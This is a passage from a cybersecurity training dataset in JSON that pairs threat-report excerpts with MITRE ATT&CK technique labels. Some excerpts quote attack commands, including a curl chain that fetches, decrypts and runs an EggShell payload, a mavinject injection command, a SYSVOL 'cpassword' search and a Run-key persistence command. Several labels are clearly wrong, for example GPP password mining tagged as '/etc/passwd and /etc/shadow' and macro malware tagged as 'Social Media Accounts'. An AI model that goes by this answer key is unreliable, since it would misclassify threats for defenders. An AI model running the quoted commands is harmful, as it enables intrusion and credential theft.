MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In the PuTTY sample discovered on VirusTotal, the malicious code was inserted into the ssh2_userauth_process_queue function (source file: putty-0.77\\ssh\\userauth2-client.c). The code resides in the part of the function responsible for performing password authentication, as opposed to other methods such as keyboard-interactive authentication or public key. Once the user establishes a connection and enters their username and password, the malicious code is executed regardless of the authentication result.", + "output": "- T1480: Execution Guardrails" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Commands passed as arguments into e.py were also seen being executed by the targeted Windows guest machine, running as a child process under vmtoolsd.exe. This execution chain can be seen in Figure 5. The parent binary /bin/rdt was not present on disk but was able to be recovered by dumping the processes memory of the ESXi hypervisor. The python script that sent out commands to the guest machines, e.py, was unable to be recovered.", + "output": "- T1202: Indirect Command Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system\u2019s architecture, downloaded the appropriate variant of PowerSploit (MD5: c326f156657d1c41a9c387415bf779d4 or 0564706ec38d15e981f71eaf474d0ab8), and reflectively loaded PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or 17587668AC577FCE0B278420B8EB72AC).", + "output": "- T1620: Reflective Code Loading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BOATLAUNCH is a utility sent from FIN7 POWERPLANT controllers that is used as a helper module during intrusion operations. BOATLAUNCH is used to patch PowerShell processes on infected systems to bypass Windows AntiMalware Scan Interface (AMSI). The malware loops, looking for unpatched PowerShell processes, and for each unpatched process the malware locates and patches amsi.dll!AmsiScanBuffer with a 5-byte instruction sequence to always return S_OK. The technique used to patch AMSI is a variation of publicly described common AMSI bypass techniques. Both 32bit and 64bit variants of BOATLAUNCH have been observed using the following export directory DLL names.", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The actors split collected files into approximately 3 MB chunks located on the Exchange server within the CU2\\he\\debug directory.", + "output": "- T1074.002: Data Staged - Remote Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Using mavinject.exe (Microsoft Application Virtualization Injector), it does code injection into explorer.exe with its payload DriverGFY.db. The technique the attacker is using here is Process Injection in the Mitre ATT&CK Framework. The command executed at runtime for doing code injection is shown below: C:\\Windows\\System32\\cmd.exe\"\" /c mavinject.exe 568 /injectrunning c:\\Drivers\\DriverGFY.db\"\"\"", + "output": "- T1218.013: System Binary Proxy Execution - Mavinject" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The script queries WMI to list all the explorer.exe processes, where it will try to inject the malicious payload. For the injection, the attackers used Mavinject (a legitimate Windows component that can be used and abused) to perform arbitrary code injections inside any running process. Mavinject.exe has been abused for several years, as indicated in this blog from 2017.", + "output": "- T1218.013: System Binary Proxy Execution - Mavinject" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Raspberry Robin leverages rundll32.exe followed by shell32.dll and calls the ShellExec_RunDLL or ShellExec_RunDLLA functions to execute the DLL via the processes such as odbcconf.exe, msiexec.exe and control.exe.", + "output": "- T1218.002: System Binary Proxy Execution - Control Panel\n- T1218.008: System Binary Proxy Execution - Odbcconf\n- T1218.007: System Binary Proxy Execution - Msiexec\n- T1218.011: System Binary Proxy Execution - Rundll32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Compiled HTML File (CHM) are commonly Microsoft help files. These file will be a compiled HTML files that includes documents , image , scripts etc. Hackers will abuse these files to embed malicious payload with CHM files. CHM files can be executed by HH.exe , which is a Microsoft windows utility. Adversaries use this techniques to evade AV or application blacklisting techniques.", + "output": "- T1218: System Binary Proxy Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When users run the malicious CHM file, the HTM file\u2019s code is executed. The script decompiles the CHM file through hh.exe and runs LBTWiz32.exe. It then creates a normal image file (KBSI_SNS_003.jpg) on the PC screen, making it difficult for users to recognize malicious behaviors.", + "output": "- T1218: System Binary Proxy Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LBTWiz32.exe that is run is a normal program. However, the malicious DLL (LBTServ.dll) created on the same path through DLL hijacking is loaded and starts operating. The malicious DLL creates and executes a malicious VBE file (ReVBShell) in the %TEMP% folder. Figures 2 to 4 show parts of the decoded VBE code.", + "output": "- T1574: Hijack Execution Flow" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If an attacker has domain admin permissions, he can steal the DC backup key and as a result, decrypt all the domain users\u2019 master keys. The Mimikatz module allowing to extract the domain backup key is lsadump::backupkeys. This module first calls the API functions LsaOpenPolicy with POLICY_GET_PRIVATE_INFORMATION as the DesiredAccess argument, so it will be able to call the function LsaRetrievePrivateData after-", + "output": "- T1207: Rogue Domain Controller" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Nefilim ransomware uses IsDebuggerPresent, CheckRemoteDebuggerPresent, and NtQueryInformationProcess API functions to check if a user-mode debugger is running. Debuggers are used by security analysts to inspect malware\u2019s behavior at the run-time. In the presence of a debugger, malware samples exhibited less malicious behavior. Moreover, Nefilim uses the NtSetInformationThread API function to evade debugging.", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Nefilim ransomware downloads the Psexec.exe tool, and it also abuses the Windows built-in WMI (Windows Management Instrumentation) utility for lateral movement. PsExec is a free Microsoft tool that can be used to execute commands and binaries on remote systems and download or upload a file over a network share. Nefilim uses PsExec and WMI with hard-coded admin credentials to remotely execute the batch files and the ransomware file in remote hosts.", + "output": "- T1570: Lateral Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mandiant assesses with moderate confidence that the threat actor obtained the session token from the operators of the info-stealer malware. These tokens were used by the actor via public VPN providers to authenticate to the target\u2019s Microsoft 365 environment.", + "output": "- T1550.004: Use Alternate Authentication Material - Web Session Cookie" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In a particular campaign, Mandiant identified that the threat actor performed initial reconnaissance via a VPS provider located in the same region as the victim. Mandiant believes a misconfiguration by the threat actor meant that the VPN services running on the VPS stopped functioning after 8 hours.", + "output": "- T1583.003: Acquire Infrastructure - Virtual Private Server" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 7 shows how DCRat collects the public IP address from the compromised host by accessing the IP web service named as \u201chttps[:]//ipinfo[.]io/json\u201d.", + "output": "- T1590.005: Gather Victim Network Information - IP Addresses" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DCRat will also drop a .bat file containing a script that runs the W32tm \u201cstripchart\u201d command on the compromised host. This command is used as a delay tactic for its execution and beaconing.", + "output": "- T1124: System Time Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The following analytic detects a powershell script that enumerates the camera mounted to the targeted host.", + "output": "- T1592.001: Gather Victim Host Information - Hardware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We detect the attachment file as W97M/Adnel or MHT/Dloader. This macro malware is usually attached in the spam emails as .doc files. It uses social engineering tricks to be able to run the malicious macro script that is disabled by default in Microsoft Office.", + "output": "- T1586.001: Compromise Accounts - Social Media Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT32 is widely known to use such social engineering techniques to trick a user into enabling macros, after which a file downloads multiple malicious payloads from remote servers.", + "output": "- T1586.001: Compromise Accounts - Social Media Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We observed that the InstallUtil.exe process was being created in suspended mode. Once it started execution, we compared its memory artifacts to a benign execution of InstallUtil.exe and concluded that the malicious payload is being injected into the memory of the newly spawned InstallUtil.exe process. We also observed that no arguments are passed to InstallUtil, which would cause an error under normal execution since InstallUtil always expects at least one argument.", + "output": "- T1218.004: System Binary Proxy Execution - InstallUtil" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Prior to executing BOOMMIC APT29 was observed creating persistence via a registry key for \u201cJava Update\u201d that would execute jucheck.exe from the directory that contained version.dll and the BOOMMIC payload. Figure 19: BOOMMIC Persistence reg add HKCU\\software\\Microsoft\\Windows\\CurrentVersion\\Run\"\" /v \"\"Java Update\"\" /t REG_SZ /d \"\"c:\\users\\\\appdata\\local\\Java\\jucheck.exe\"\"\"\"\"", + "output": "- T1112: Modify Registry\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT29 was the hunting for passwords stored in SYSVOL. This technique relies on passwords that are stored as part of Group Policy Preferences. Passwords stored in this way are encrypted using a known scheme that can easily be decrypted. APT29 GPP password datamining C:\\WINDOWS\\system32\\cmd.exe /C findstr /S /I cpassword \\\\DOMAIN\\sysvol\\DOMAIN\\policies\\*.xml", + "output": "- T1003.008: OS Credential Dumping - /etc/passwd and /etc/shadow" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Attackers modified the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP\u2019s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file.", + "output": "- T1553: Subvert Trust Controls" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A threat actor can craft a malicious file that would evade Mark of the Web (MOTW) defenses, resulting in a limited loss of integrity and availability of security features, which rely on MOTW tagging \u2013 for example, \u2018Protected View\u2019 in Microsoft Office. This zero-day has a moderate CVSS risk score of 5.4, because it only helps to avoid the Microsoft Defender SmartScreen defense mechanism, which has no RCE or DoS functionality.", + "output": "- T1553.005: Subvert Trust Controls - Mark-of-the-Web Bypass" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The app executes the following shell command to download a custom-compiled version of the EggShell server for macOS: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py The first part of the command downloads an encoded file from a Github page belonging to a user named youarenick\"\" and saves that file to a hidden file named .info.enc in /private/tmp/. Next, it uses openssl to decode that file into a hidden Python file named .info.py. Finally, it executes the resulting Python script.\"\"\"", + "output": "- T1553.001: Subvert Trust Controls - Gatekeeper Bypass" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The loaded assembly, obfuscated with an Agile.NET obfuscator, hollows a legitimate MSBuild.exe process and replaces it with its payload: the hex-encoded Panda Stealer binary from another paste.ee URL.", + "output": "- T1055.012: Process Injection - Process Hollowing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Carbanak also performs techniques for disabling security tools, deleting files that are left in malicious activity, and modifying registry to hide configuration information.", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools\n- T1112: Modify Registry\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BAT files were used to download and execute the Cring ransomware on the other systems in the compromised network. It also uses the Windows CertUtil program to help with the said download.", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The ransomware can also get into the system through certain vulnerability exploits.. The abuse of the aforementioned Adobe ColdFusion flaw (CVE-2010-2861) to enter the system is a new development for the threat. In the past, Cring was also used to exploit a FortiGate VPN server vulnerability (CVE-2018-13379).", + "output": "- T1210: Exploitation of Remote Services\n- T1499.004: Endpoint Denial of Service - Application or System Exploitation\n- T1587.004: Develop Capabilities - Exploits\n- T1588.005: Obtain Capabilities - Exploits\n- T1190: Exploit Public-Facing Application\n- T1588.006: Obtain Capabilities - Vulnerabilities\n- T1203: Exploitation for Client Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lateral movement was done through Cobalt Strike. This tool was also used to distribute BAT files that will be used later for various purposes, including impairing the system\u2019s defenses.", + "output": "- T1570: Lateral Tool Transfer\n- T1562: Impair Defenses\n- T1588.002: Obtain Capabilities - Tool" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Monero miner scripts are downloaded from TeamTNT\u2019s server and piped to \u201cbash\u201d using a SSH session on the underlying host as the \u201croot\u201d user by supplying the private key from \u201c/tmp/TeamTNT.\u201d Later, the private key \u201c/tmp/TeamTNT\u201d is removed as well.", + "output": "- T1098.004: Account Manipulation - SSH Authorized Keys\n- T1021.004: Remote Services - SSH\n- T1588.001: Obtain Capabilities - Malware\n- T1588.002: Obtain Capabilities - Tool\n- T1195: Supply Chain Compromise\n- T1552.004: Unsecured Credentials - Private Keys\n- T1059.004: Command and Scripting Interpreter - Unix Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "the filename changed from tru.dll to kibuyuink.exe, even though it remained a DLL and still required regsvr32.exe to run. Changing the filename extension is a common tactic seen in various malware infections.", + "output": "- T1546.001: Event Triggered Execution - Change Default File Association\n- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The C&C domain android[.]viral91[.]xyz, where the malware was connecting to also shows that it is very likely that the APT team uses subdomains to host or connect to Android malware. In previous years, some CrimsonRAT samples were also found to be hosted on the viral91[.]xyz domain.", + "output": "- T1584.001: Compromise Infrastructure - Domains\n- T1588.001: Obtain Capabilities - Malware\n- T1583.001: Acquire Infrastructure - Domains\n- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In one instance, FIN13 deployed a backdoor called MAILSLOT, which communicates over SMTP/POP over SSL, sending and receiving emails to and from a configured attacker-controlled email account for its command and control. MAILSLOT makes FIN13 a rare case of a threat actor who has used email communications for C2.", + "output": "- T1102.003: Web Service - One-Way Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In this intrusion from December 2021, the threat actors utilized IcedID as the initial access vector. IcedID is a banking trojan that first appeared in 2017, usually, it is delivered via malspam campaigns and has been widely used as an initial access vector in multiple ransomware intrusions. Upon execution of\u2026 .", + "output": "- T1219: Remote Access Software" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Emotet occasionally takes a break from delivering malicious emails. Emotet's longest absence from the threat landscape occurred in early February 2020 and lasted more than five months. Emotet resumed operations in mid-July 2020, and it quickly surpassed other threats in sheer volume of malicious spam.", + "output": "- T1566: Phishing\n- T1098.002: Account Manipulation - Additional Email Delegate Permissions" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When issuing a beacon to its C2, PingPull will send an Echo Request packet to the C2 server with total and current set to 0 and will include no encoded and encrypted data, as seen in Figure 1.", + "output": "- T1132: Data Encoding\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the 